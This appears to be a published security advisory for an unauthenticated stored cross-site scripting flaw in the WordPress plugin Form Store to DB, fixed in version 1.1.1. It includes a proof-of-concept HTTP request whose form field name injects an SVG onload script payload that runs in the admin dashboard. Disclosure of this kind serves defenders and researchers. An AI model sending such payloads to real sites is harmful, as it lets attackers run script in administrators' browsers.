WordPress Plugin Vulnerabilities
Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not sanitise and escape parameter keys before outputting it back in the created entry, allowing unauthenticated attacker to perform Cross-Site Scripting attacks against admin
Proof of Concept
POST /wp-json/contact-form-7/v1/contact-forms/1337/feedback HTTP/2 Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470 -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name="your-name" Attacker -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name="your-email" [email protected] -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name="your-subject" XSS Injection -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name="your-message" Sorry, not sorry. -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name="AA<svg/onload=(alert)(/XSS/)>" Injected -----------------------------243715402120191890871051639470-- The XSS will be triggered when viewing the related Entry in the admin dashboard (/wp-admin/edit.php?post_type=cf7storetodbs)
Affects Plugins
Fixed in version 1.1.1
References
Classification
Miscellaneous
Original Researcher
Yoru Oni
Submitter
Yoru Oni
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-17 (about 5 months ago)
Added
2022-01-17 (about 5 months ago)
Last Updated
2022-04-12 (about 2 months ago)